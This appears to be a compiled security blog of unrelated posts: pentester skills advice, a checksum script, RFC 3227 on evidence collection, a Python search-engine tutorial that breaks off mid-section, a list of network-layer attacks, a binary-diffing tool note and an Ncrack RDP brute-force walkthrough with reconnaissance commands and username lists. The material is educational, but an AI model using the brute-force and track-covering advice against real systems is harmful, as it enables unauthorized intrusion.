Pages

Ideal Skill Set for Penetration Testing

Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.

1. Mastery of an operating system. I can’t stress enough how important this is. So many people want to become hackers or systems security experts without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?

2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP inside and out. Not just that it stands for Transmission Control Protocol, but actually know the structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by W. Richard Stevens (either edition works). Know the difference between TCP and UDP. Understand routing; be able to describe in detail how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?
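To make “know the structure of the packet” concrete, here is a minimal sketch (not from the article) that packs and parses the fixed 20-byte TCP header defined in RFC 793, using Python’s struct module. The port numbers and sequence values are arbitrary examples:

```python
import struct

# Parse the fixed 20-byte TCP header (RFC 793). The field layout -- source
# port, destination port, sequence number, acknowledgement number,
# data offset/flags, window, checksum, urgent pointer -- is exactly the kind
# of detail the article is asking you to know.
def parse_tcp_header(raw):
    (src_port, dst_port, seq, ack,
     offset_flags, window, checksum, urg) = struct.unpack('!HHIIHHHH', raw[:20])
    data_offset = (offset_flags >> 12) * 4   # header length in bytes
    flags = offset_flags & 0x01FF            # SYN, ACK, FIN, etc.
    return {'src_port': src_port, 'dst_port': dst_port, 'seq': seq,
            'ack': ack, 'data_offset': data_offset, 'flags': flags,
            'window': window, 'checksum': checksum, 'urgent': urg}

# Build a fake SYN segment (port 54321 -> 80) just to exercise the parser.
header = struct.pack('!HHIIHHHH', 54321, 80, 1000, 0,
                     (5 << 12) | 0x002,      # offset = 5 words, SYN flag set
                     65535, 0, 0)
fields = parse_tcp_header(header)
```

If you can read and write this layout without looking it up, you know TCP at the level the article means.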

3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP spoof or a MitM attack actually works. In short, how can you violate or manipulate a process if you don’t even know how the process works, or worse, don’t even know the process exists? Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see one work, the first thing that comes to my mind is “how does it work?”

4. Learn some basic scripting. Start with something simple, like VBS or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight, so if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program, or in short, write basic software (hello world DOES NOT count).
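The same automation idea can be sketched in Python: a tiny recon helper that resolves a list of hostnames (a Bash version would do the same with `host` inside a for loop). The hostname list here is just an example:

```python
import socket

# A toy recon-automation sketch: resolve a list of hostnames to IP addresses.
# Hostnames that fail to resolve are recorded as None instead of crashing.
def resolve_hosts(hostnames):
    results = {}
    for name in hostnames:
        try:
            results[name] = socket.gethostbyname(name)
        except socket.gaierror:
            results[name] = None   # did not resolve
    return results

ips = resolve_hosts(['localhost', 'no-such-host.invalid'])
```

The point is not the script itself but the habit: once a task is scripted, you can run it against a whole scope instead of one host at a time.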

5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on eBay, or maybe ask your company for old ones. Start with simple ACLs on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s no better way to understand these concepts than to apply them. Once you’ve mastered this, you can move to a PIX or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really, the point is to learn to do them.

6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.

7. Eventually learn a programming language, then learn a few more. Don’t go and buy a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, and see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!
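As a sketch of the kind of starter project described above, here is a minimal TCP connect() port scanner in Python. Real scanners like nmap craft raw packets and do far more; this just attempts a full TCP handshake on each port:

```python
import socket

# A minimal TCP connect() scanner: try to complete a handshake on each port
# and report the ones that accept. Only scan hosts you are authorized to test.
def scan_ports(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

For example, `scan_ports('127.0.0.1', range(20, 1025))` checks the well-known ports on your own machine. Comparing this against nmap’s output on the same host is a good first exercise.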

8. Have a desire and drive to learn new stuff. This is a must; it’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for) to really get a handle on things and stay up to date.

9. Learn a little about databases and how they work. Go download MySQL and read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs helps.
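To illustrate the basic constructs, here is a minimal sketch using Python’s built-in sqlite3 module. The same SQL (tables, INSERT, SELECT) applies to MySQL; sqlite3 is used here only because it ships with Python and needs no server:

```python
import sqlite3

# Create an in-memory database, define a table, insert a row, and query it.
conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)')
# Parameterized queries (the ? placeholder) also matter for understanding
# SQL injection later on.
conn.execute('INSERT INTO users (name) VALUES (?)', ('keatron',))
rows = conn.execute('SELECT id, name FROM users').fetchall()
conn.close()
```

Understanding this much is enough to follow how web applications talk to their databases, which is where attacks like SQL injection live.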

10. Always be willing to interact and share your knowledge with like-minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery and janitorial work; one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.
These things should get you started. Let me know if you have questions or comments.
Keatron.

reference:
http://resources.infosecinstitute.com/ideal-skill-set-for-the-penetration-testing/

Simple CheckSum in Python

Hey everyone, it’s been too long since I’ve contributed to the world of computer security. Okay, now I’ll share again: my simple script to check the MD5 and SHA1 checksums of a file.
# This Tool for checking file signature in MD5 and SHA1
# Thanks: mywisdom, whitehat, patriot, zee, flyff666
# Visit Us in http://codewall-security
# My Blog http://devilz-kiddies.blogspot.com
# My Website http://notoshuri.com
# I love you, need you, and miss you very much, honey

import sys
import hashlib

print('''
    ----------------------------------------------
    # Simple MD5 and SHA1 CheckSum               #
    # Author Kiddies A.k.A peneter A.k.A Hadrian #
    # Copyright 2012                             #
    ----------------------------------------------
    ''')

if len(sys.argv) != 2:
    # Print a usage message to stderr when no file argument is given
    print("Usage: SCheckSum.py <file>", file=sys.stderr)
    sys.exit(1)

# Read the whole file in binary mode and hash its contents
with open(sys.argv[1], 'rb') as doc:
    data = doc.read()

print('MD5 CheckSum')
print(hashlib.md5(data).hexdigest())
print('SHA1 CheckSum')
print(hashlib.sha1(data).hexdigest())
This is a screenshot:





Thanks for visiting my blog. Happy coding, and imagine your world!

RFC 3227 - Guidelines for Evidence Collection and Archiving

Status of this Memo

   This document specifies an Internet Best Current Practices for the
   Internet Community, and requests discussion and suggestions for
   improvements.  Distribution of this memo is unlimited.

Copyright Notice

   Copyright (C) The Internet Society (2002).  All Rights Reserved.

Abstract

   A "security incident" as defined in the "Internet Security Glossary",
   RFC 2828, is a security-relevant system event in which the system's
   security policy is disobeyed or otherwise breached.  The purpose of
   this document is to provide System Administrators with guidelines on
   the collection and archiving of evidence relevant to such a security
   incident.

   If evidence collection is done correctly, it is much more useful in
   apprehending the attacker, and stands a much greater chance of being
   admissible in the event of a prosecution.

Table of Contents

   1 Introduction
     1.1 Conventions Used in this Document
   2 Guiding Principles during Evidence Collection
     2.1 Order of Volatility
     2.2 Things to avoid
     2.3 Privacy Considerations
     2.4 Legal Considerations
   3 The Collection Procedure
     3.1 Transparency
     3.2 Collection Steps
   4 The Archiving Procedure
     4.1 Chain of Custody
     4.2 The Archive
   5 Tools you'll need
   6 References
   7 Acknowledgements
   8 Security Considerations
   9 Authors' Addresses
   10 Full Copyright Statement

1 Introduction

   A "security incident" as defined in [RFC2828] is a security-relevant
   system event in which the system's security policy is disobeyed or
   otherwise breached.  The purpose of this document is to provide
   System Administrators with guidelines on the collection and archiving
   of evidence relevant to such a security incident.  It's not our
   intention to insist that all System Administrators rigidly follow
   these guidelines every time they have a security incident.  Rather,
   we want to provide guidance on what they should do if they elect to
   collect and protect information relating to an intrusion.

   Such collection represents a considerable effort on the part of the
   System Administrator.  Great progress has been made in recent years
   to speed up the re-installation of the Operating System and to
   facilitate the reversion of a system to a 'known' state, thus making
   the 'easy option' even more attractive.  Meanwhile little has been
   done to provide easy ways of archiving evidence (the difficult
   option).  Further, increasing disk and memory capacities and the more
   widespread use of stealth and cover-your-tracks tactics by attackers
   have exacerbated the problem.

   If evidence collection is done correctly, it is much more useful in
   apprehending the attacker, and stands a much greater chance of being
   admissible in the event of a prosecution.

   You should use these guidelines as a basis for formulating your
   site's evidence collection procedures, and should incorporate your
   site's procedures into your Incident Handling documentation.  The
   guidelines in this document may not be appropriate under all
   jurisdictions.  Once you've formulated your site's evidence
   collection procedures, you should have law enforcement for your
   jurisdiction confirm that they're adequate.

1.1 Conventions Used in this Document

   The key words "REQUIRED", "MUST", "MUST NOT", "SHOULD", "SHOULD NOT",
   and "MAY" in this document are to be interpreted as described in "Key
   words for use in RFCs to Indicate Requirement Levels" [RFC2119].

2 Guiding Principles during Evidence Collection

      -  Adhere to your site's Security Policy and engage the
         appropriate Incident Handling and Law Enforcement personnel.

      -  Capture as accurate a picture of the system as possible.

      -  Keep detailed notes.  These should include dates and times.  If
         possible generate an automatic transcript.  (e.g., On Unix
         systems the 'script' program can be used, however the output
         file it generates should not be to media that is part of the
         evidence).  Notes and print-outs should be signed and dated.

      -  Note the difference between the system clock and UTC.  For each
         timestamp provided, indicate whether UTC or local time is used.

      -  Be prepared to testify (perhaps years later) outlining all
         actions you took and at what times.  Detailed notes will be
         vital.

      -  Minimise changes to the data as you are collecting it.  This is
         not limited to content changes; you should avoid updating file
         or directory access times.

      -  Remove external avenues for change.

      -  When confronted with a choice between collection and analysis
         you should do collection first and analysis later.

      -  Though it hardly needs stating, your procedures should be
         implementable.  As with any aspect of an incident response
         policy, procedures should be tested to ensure feasibility,
         particularly in a crisis.  If possible procedures should be
         automated for reasons of speed and accuracy.  Be methodical.

      -  For each device, a methodical approach should be adopted which
         follows the guidelines laid down in your collection procedure.
         Speed will often be critical so where there are a number of
         devices requiring examination it may be appropriate to spread
         the work among your team to collect the evidence in parallel.
         However on a single given system collection should be done step
         by step.

      -  Proceed from the volatile to the less volatile (see the Order
         of Volatility below).

      -  You should make a bit-level copy of the system's media.  If you
         wish to do forensics analysis you should make a bit-level copy
         of your evidence copy for that purpose, as your analysis will
         almost certainly alter file access times.  Avoid doing
         forensics on the evidence copy.

2.1 Order of Volatility

   When collecting evidence you should proceed from the volatile to the
   less volatile.  Here is an example order of volatility for a typical
   system.

      -  registers, cache

      -  routing table, arp cache, process table, kernel statistics,
         memory

      -  temporary file systems

      -  disk

      -  remote logging and monitoring data that is relevant to the
         system in question

      -  physical configuration, network topology

      -  archival media

2.2 Things to avoid

   It's all too easy to destroy evidence, however inadvertently.

      -  Don't shutdown until you've completed evidence collection.
         Much evidence may be lost and the attacker may have altered the
         startup/shutdown scripts/services to destroy evidence.

      -  Don't trust the programs on the system.  Run your evidence
         gathering programs from appropriately protected media (see
         below).

      -  Don't run programs that modify the access time of all files on
         the system (e.g., 'tar' or 'xcopy').

      -  When removing external avenues for change note that simply
         disconnecting or filtering from the network may trigger
         "deadman switches" that detect when they're off the net and
         wipe evidence.

2.3 Privacy Considerations

      -  Respect the privacy rules and guidelines of your company and
         your legal jurisdiction.  In particular, make sure no
         information collected along with the evidence you are searching
         for is available to anyone who would not normally have access
         to this information.  This includes access to log files (which
         may reveal patterns of user behaviour) as well as personal data
         files.

      -  Do not intrude on people's privacy without strong
         justification.  In particular, do not collect information from
         areas you do not normally have reason to access (such as
         personal file stores) unless you have sufficient indication
         that there is a real incident.

      -  Make sure you have the backing of your company's established
         procedures in taking the steps you do to collect evidence of an
         incident.

2.4 Legal Considerations

   Computer evidence needs to be

      -  Admissible:  It must conform to certain legal rules before it
         can be put before a court.

      -  Authentic:  It must be possible to positively tie evidentiary
         material to the incident.

      -  Complete:  It must tell the whole story and not just a
         particular perspective.

      -  Reliable:  There must be nothing about how the evidence was
         collected and subsequently handled that casts doubt about its
         authenticity and veracity.

      -  Believable:  It must be readily believable and understandable
         by a court.

3 The Collection Procedure

   Your collection procedures should be as detailed as possible.  As is
   the case with your overall Incident Handling procedures, they should
   be unambiguous, and should minimise the amount of decision-making
   needed during the collection process.

3.1 Transparency

   The methods used to collect evidence should be transparent and
   reproducible.  You should be prepared to reproduce precisely the
   methods you used, and have those methods tested by independent
   experts.

3.2 Collection Steps

      -  Where is the evidence?  List what systems were involved in the
         incident and from which evidence will be collected.

      -  Establish what is likely to be relevant and admissible.  When
         in doubt err on the side of collecting too much rather than not
         enough.

      -  For each system, obtain the relevant order of volatility.

      -  Remove external avenues for change.

      -  Following the order of volatility, collect the evidence with
         tools as discussed in Section 5.

      -  Record the extent of the system's clock drift.

      -  Question what else may be evidence as you work through the
         collection steps.

      -  Document each step.

      -  Don't forget the people involved.  Make notes of who was there
         and what were they doing, what they observed and how they
         reacted.

   Where feasible you should consider generating checksums and
   cryptographically signing the collected evidence, as this may make it
   easier to preserve a strong chain of evidence.  In doing so you must
   not alter the evidence.

4 The Archiving Procedure

   Evidence must be strictly secured.  In addition, the Chain of Custody
   needs to be clearly documented.

4.1 Chain of Custody

   You should be able to clearly describe how the evidence was found,
   how it was handled and everything that happened to it.

   The following need to be documented

      -  Where, when, and by whom was the evidence discovered and
         collected.

      -  Where, when and by whom was the evidence handled or examined.

      -  Who had custody of the evidence, during what period.  How was
         it stored.

      -  When the evidence changed custody, when and how did the
         transfer occur (include shipping numbers, etc.).

4.2 Where and how to Archive

   If possible commonly used media (rather than some obscure storage
   media) should be used for archiving.

   Access to evidence should be extremely restricted, and should be
   clearly documented.  It should be possible to detect unauthorised
   access.

5 Tools you'll need

   You should have the programs you need to do evidence collection and
   forensics on read-only media (e.g., a CD).  You should have prepared
   such a set of tools for each of the Operating Systems that you manage
   in advance of having to use it.

   Your set of tools should include the following:

      -  a program for examining processes (e.g., 'ps').

      -  programs for examining system state (e.g., 'showrev',
         'ifconfig', 'netstat', 'arp').

      -  a program for doing bit-to-bit copies (e.g., 'dd', 'SafeBack').

      -  programs for generating checksums and signatures (e.g.,
         'sha1sum', a checksum-enabled 'dd', 'SafeBack', 'pgp').

      -  programs for generating core images and for examining them
         (e.g., 'gcore', 'gdb').

      -  scripts to automate evidence collection (e.g., The Coroner's
         Toolkit [FAR1999]).

   The programs in your set of tools should be statically linked, and
   should not require the use of any libraries other than those on the
   read-only media.  Even then, since modern rootkits may be installed
   through loadable kernel modules, you should consider that your tools
   might not be giving you a full picture of the system.

   You should be prepared to testify to the authenticity and reliability
   of the tools that you use.
 
reference: http://www.faqs.org/rfcs/rfc3227.html

Create Your Own Search Engine with Python

The ability to search a specific web site for the page you are looking for is a very useful feature. However, searching can be complicated and providing a good search experience can require knowledge of multiple programming languages. This article will demonstrate a simple search engine including a sample application you can run in your own site. This sample application is also a good introduction to the Python programming language.
This application is a combination of Python, JavaScript, CSS (Cascading Style Sheets), and HTML. You can run this application on any server which supports CGI and has Python installed. This application was tested with Python version 2.5.1. I ran this application with the Apache HTTP server. The JavaScript and style sheets for this page have been tested with Internet Explorer, Firefox, and Safari.
The code in this application is free and is released under the Apache 2.0 license. That means you are welcome to use, copy, and change this code as much as you would like. If you find any bugs, have any comments, or make any improvements I would love to hear from you. There are a couple of other programs needed to run this application. They are all free, but some of them use different licenses. You should make sure to read and understand each license before using a product.

Get the Source Code

You should start by downloading the source code for this sample. It can be found here. Once you have downloaded it you can unzip it to a work directory on your computer.

Other Programs

This program has been designed to run with the Python interpreter. You will need to have Python installed in order to use this program. If you do not already have Python you must download and install it before you run this sample.
This program can be run locally for testing, but it is meant to be run along with an HTTP server. This program will run in any HTTP server which supports CGI, but it has only been tested with the Apache HTTP server.

Run the Sample

Once you have installed Python and the Apache HTTP server you can run this program using the following steps. These steps will write an HTML document containing the search results to the system console. You can pipe this output to a file and open that file in your web browser. You may need to either add the Python executable to your path or indicate the full path to that executable, depending on your system configuration.
  1. Unzip the samples archive to a directory on your machine.
  2. Open a command prompt and change directories to the location you unzipped the sample in.
  3. You can run the command python search.py > searchoutput.html to test this sample locally.
This application has been configured to run via the command line interface for easy access and testing. Configuration for a web server will be discussed later in this article.

Core Technologies

This program will use the following core technologies:
  • Python
  • JavaScript
  • Cascading Style Sheets
  • HTML
This application is meant to be a useful sample of a web site search engine. It is also a good introduction to Python, CSS, JavaScript, and HTML. This sample will demonstrate how these four technologies can work together to create a rich and configurable user interface for searching your applications.

Why Python

There are a lot of web scripting languages and tools available. PERL and Ruby come quickly to mind, but there are many more. Python is a dynamically typed, object-oriented language. In comparison to Java, Python allows you to reassign object types, and it does not require all code to be within an object in the way that Java does. Python can also work more like a traditional scripting language with less object use.
PERL has a specialized syntax which can be difficult to learn, and Ruby most commonly relies on the Rails framework. They are both very popular, and this application could have easily been written with either of them. The benefits of PERL vs. Ruby vs. Python have been debated many times and I will not go over them here. Python just happens to be the language I was most interested in when I first wrote this code.

How It Works

This application works as a combination of four technologies. Some of the code in this application will run on your server and some will run in the browser. It is important to remember the context in which the code will run when creating it.
(Figure: search_flow)
This sample includes a sample search form named Search.html. You can customize this file as much as you want, but you must make sure that the names of the form controls remain the same. This form specifies an action URL of /cgi-bin/search.py. You may have to change this URL to reflect the location where you have placed the search script on your web server. Once the user enters search terms and presses the search button, the data will be sent to the search.py script on the server. This script will take the search terms, do the actual search, and return the search results.
The search results page will be generated based on the SearchResults.html file which must be placed in the same directory as the search.py script. This HTML file contains two special values ${SEARCH_TERMS_GO_HERE} and ${SEARCH_RESULTS_GO_HERE}. These values will be replaced with the search terms and the search results respectively. Each of the search results contains a link to the page where the terms were found and some special information for the JavaScript in each page to use when highlighting the search terms. When the user clicks on one of these links they will get the HTML page containing the search terms with each term highlighted when it appears in the text.
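The placeholder replacement described above can be sketched with Python’s string.Template, whose ${NAME} syntax matches the placeholders in SearchResults.html. The HTML snippet, search terms, and result link below are stand-ins, not the sample’s actual files:

```python
from string import Template

# A stand-in for SearchResults.html, using the placeholder names from the
# article. In the real sample this text would be read from the file on disk.
page_template = Template('''<html><body>
<h1>Results for: ${SEARCH_TERMS_GO_HERE}</h1>
${SEARCH_RESULTS_GO_HERE}
</body></html>''')

# Fill in both placeholders; the values here are hypothetical examples.
html = page_template.substitute(
    SEARCH_TERMS_GO_HERE='python cgi',
    SEARCH_RESULTS_GO_HERE='<ul><li><a href="/docs/cgi.html">cgi.html</a></li></ul>')
```

The real search.py presumably does the equivalent: load the template, substitute the two values, and print the finished page to standard output for the web server.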
Each page with highlighting enabled must contain a couple of small code references. Somewhere in the header of each HTML file you must import the JavaScript and CSS files which know how to handle the search. That code looks like this:

Network Security at the Network Layer (Layer 3: IP)

Every layer of communication has its own unique security challenges. The Network Layer (Layer 3 in the OSI model) is especially vulnerable to many denial-of-service attacks and information privacy problems. The most popular protocol used at the network layer is IP (Internet Protocol). The following are the key security risks at the Network Layer associated with IP:
IP Spoofing: The intruder sends messages to a host with an IP address (not its own) indicating that the message is coming from a trusted host, in order to gain unauthorized access to that host or other hosts. To engage in IP spoofing, a hacker must first use a variety of techniques to find the IP address of a trusted host and then modify the packet headers so that the packets appear to be coming from that host.
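For illustration only, here is a sketch of the packet-header side of spoofing: building a raw IPv4 header (RFC 791) whose source-address field is set to an arbitrary address. Actually sending such a packet would require a raw socket and elevated privileges; this code only constructs and checksums the header, and the addresses are made-up examples:

```python
import socket
import struct

# One's-complement sum of 16-bit words: the IPv4 header checksum (RFC 791).
def ip_checksum(header):
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) + header[i + 1]
    while total > 0xFFFF:                       # fold carries back in
        total = (total >> 16) + (total & 0xFFFF)
    return ~total & 0xFFFF

# Build a 20-byte IPv4 header with an arbitrary ("spoofed") source address.
def build_ipv4_header(spoofed_src, dst):
    ver_ihl, tos, length = 0x45, 0, 20          # version 4, 5-word header
    ident, frag, ttl, proto = 0, 0, 64, socket.IPPROTO_TCP
    header = struct.pack('!BBHHHBBH4s4s', ver_ihl, tos, length, ident, frag,
                         ttl, proto, 0,         # checksum field zero for now
                         socket.inet_aton(spoofed_src), socket.inet_aton(dst))
    csum = ip_checksum(header)
    return header[:10] + struct.pack('!H', csum) + header[12:]

hdr = build_ipv4_header('10.0.0.1', '192.168.1.5')
```

Nothing in the header authenticates the source field, which is exactly why spoofing works; defenses such as ingress filtering have to happen in the network, not in the packet.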
Routing (RIP) attacks : Routing Information Protocol (RIP) is used to distribute routing information within networks, such as shortest-paths, and advertising routes out from the local network. RIP has no built in authentication, and the information provided in a RIP packet is often used without verifying it. An attacker could forge a RIP packet, claiming his host "X" has the fastest path out of the network. All packets sent out from that network would then be routed through X, where they could be modified or examined. An attacker could also use RIP to effectively impersonate any host, by causing all traffic sent to that host to be sent to the attacker's machine instead.
ICMP Attacks: ICMP is used by the IP layer to send one-way informational messages to a host. There is no authentication in ICMP, which leads to attacks using ICMP that can result in a denial of service or allow the attacker to intercept packets. Denial of service attacks primarily use either the ICMP "Time exceeded" or "Destination unreachable" messages. Both of these ICMP messages can cause a host to immediately drop a connection. An attacker can make use of this by simply forging one of these ICMP messages and sending it to one or both of the communicating hosts; their connection will then be broken. The ICMP "Redirect" message is commonly used by gateways when a host has mistakenly assumed the destination is not on the local network. If an attacker forges an ICMP "Redirect" message, it can cause another host to send packets for certain connections through the attacker's host.
PING Flood (ICMP Flood): PING is one of the most common uses of ICMP; it sends an ICMP "Echo Request" to a host and waits for that host to send back an ICMP "Echo Reply" message. The attacker simply sends a huge number of ICMP Echo Requests to the victim to crash or slow down its system. This is an easy attack because many ping utilities support this operation, and the attacker doesn't need much knowledge.
Ping of Death Attack: An attacker sends an ICMP Echo Request packet that is much larger than the maximum IP packet size to the victim. Since the received ICMP Echo Request packet is bigger than the normal IP packet size, the victim cannot reassemble the fragments. The OS may crash or reboot as a result.
Teardrop Attack: An attacker uses the Teardrop program to send IP fragments that cannot be reassembled properly, by manipulating the offset values of the packets, causing the victim system to reboot or halt. Many other variants such as targa, SYNdrop, Boink, Nestea, Bonk, TearDrop2 and NewTear are available. A simple reboot is the preferred remedy after this happens.
Packet Sniffing: Because most network applications transmit network packets in clear text, a packet sniffer can provide its user with meaningful and often sensitive information, such as user account names and passwords. A packet sniffer can provide an attacker with information that is queried from a database, as well as the user account names and passwords used to access that database. This causes serious information privacy problems and provides tools for crime.
Like most network security problems, there is no silver-bullet solution to FIX these problems; however, there are many technologies and solutions available to mitigate them and to monitor the network to reduce the damage if an attack happens. Problems such as PING floods can be effectively reduced by deploying firewalls at critical locations of a network to filter unwanted traffic and traffic from suspicious sources. By utilizing IPsec VPNs at the network layer and by using session and user (or host) authentication and data encryption technologies at the data link layer, the risk of IP spoofing and packet sniffing is reduced significantly. IPv6 in combination with IPsec provides better security mechanisms for communication at the network level and above.

DarunGrim: A Patch Analysis and Binary Diffing Tool

DarunGrim is a free binary diffing tool. Binary diffing is a powerful technique for reverse-engineering patches released by software vendors like Microsoft. By analyzing security patches in particular, you can dig into the details of the vulnerabilities they fix. You can use that information to learn what caused the software to break, and it can help you write protection code for those specific vulnerabilities. It's also used by malware writers and security researchers to write 1-day exploits. This binary diffing technique is especially useful for Microsoft binaries: unlike other vendors, Microsoft releases patches regularly, and the patched vulnerabilities are relatively concentrated in small areas of the code. That makes the patched parts more visible and apparent to patch analyzers. The "eEye Binary Diffing Suite", released back in 2006, is widely used by security researchers to identify vulnerabilities; even though it's free and open source, it's powerful enough for that vulnerability-hunting purpose. DarunGrim2 is a C++ port of the original Python code and is much faster than the original DarunGrim, and DarunGrim3 is an advanced version of DarunGrim2 that provides a nice file management UI. Binaries: http://github.com/ohjeongwook/DarunGrim/downloads
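The core idea of binary diffing can be illustrated with a toy byte-level diff. DarunGrim and the eEye suite diff at the disassembly/function level rather than raw bytes, but the goal of locating the patched spots is the same; the byte strings below are made-up stand-ins for two builds of a binary:

```python
# A toy illustration of binary diffing: report the offsets where two builds
# of a "binary" differ. Real tools match functions and basic blocks in the
# disassembly so the diff survives recompilation shifts; raw bytes do not.
def byte_diff(old, new):
    diffs = []
    for offset in range(min(len(old), len(new))):
        if old[offset] != new[offset]:
            diffs.append(offset)
    if len(old) != len(new):
        diffs.append(min(len(old), len(new)))  # size change starts here
    return diffs

# Two fake 5-byte "builds" differing at offset 3 (a NOP replaced by INT3).
patched_offsets = byte_diff(b'\x55\x89\xe5\x90\xc3', b'\x55\x89\xe5\xcc\xc3')
```

In a real patch analysis, each differing region is then examined in a disassembler to understand what vulnerability the change fixes.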
Source: http://github.com/ohjeongwook/DarunGrim
References: http://www.darungrim.org/, http://exploitshop.wordpress.com

Ncrack – Remote Desktop Brute Force Tutorial

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such as SSH and VNC, are more likely to be targeted and exploited with a remote brute-force password-guessing attack. For example, let's suppose that we are in the middle of a penetration testing session at the "MEGACORP" offices and we have already tried all the available remote attacks with no luck. We also tried ARP-poisoning the LAN in the hope of capturing user names and passwords, without success. From a previous nmap scan log we found a few Windows machines with the RDP port open, and we decided to investigate this possibility further. First of all we need some valid usernames, so that we only have to guess passwords rather than both. We found the names of the IT staff on various social networking websites. These are the key IT staff:
jessie tagle julio feagins hugh duchene darmella martis lakisha mcquain ted restrepo kelly missildine
It didn't take long to create probable usernames by following the common convention of using the first letter of the first name plus the entire surname.
jtagle jfeagins hduchene dmartis lmcquain trestrepo kmissildine
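The naming convention above is mechanical enough to script. Here is a small sketch (using the name list from the text) that derives the first-initial-plus-surname usernames with awk:

```shell
# Derive usernames: first letter of the first name + full surname, lowercased.
printf '%s\n' \
  "jessie tagle" "julio feagins" "hugh duchene" "darmella martis" \
  "lakisha mcquain" "ted restrepo" "kelly missildine" |
awk '{ print tolower(substr($1, 1, 1) $2) }'
# prints jtagle, jfeagins, hduchene, dmartis, lmcquain, trestrepo, kmissildine
```

Handy when the target uses a predictable naming scheme and the staff list is long.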
Software required: a Linux machine, preferably Ubuntu, with nmap and a terminal server client:

sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev

About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated brute-forcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's, and many more. Supported protocols include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, and Telnet. http://nmap.org/ncrack/

Installation
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering

Let's find out which hosts on the network are up and save them to a text file. The regular expression parses the scan output and extracts only the IP addresses.

Nmap ping scan (go no further than determining if a host is online):
nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt
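To see what that grep expression does, here is a hypothetical fragment of nmap ping-scan output (invented for illustration, not a real scan log) piped through the same regex; only the dotted-quad addresses survive:

```shell
# Simulated nmap -sP output lines; grep -Eo keeps only the IPv4 addresses.
printf '%s\n' \
  "Nmap scan report for 192.168.56.10" \
  "Host is up (0.0017s latency)." \
  "Nmap scan report for 192.168.56.101" |
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'
# prints 192.168.56.10 and 192.168.56.101, one per line
```

Note the regex matches any dotted quad, so non-address numbers formatted the same way would slip through; for a quick target list that is usually good enough.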
Nmap fast scan with input from list of hosts/networks
nmap -F -iL 192.168.56.0.txt

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST
Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)
Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)
Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds
From the log we can see two machines with the Microsoft terminal service port (3389) open. Looking more in depth at the services available on 192.168.56.10, we can assume that this machine might be the domain controller, and it's worth trying to pwn it. At this point we need to create a file (my.usr) with the probable usernames gathered earlier.
vim my.usr

jtagle
jfeagins
hduchene
trestrepo
kmissildine
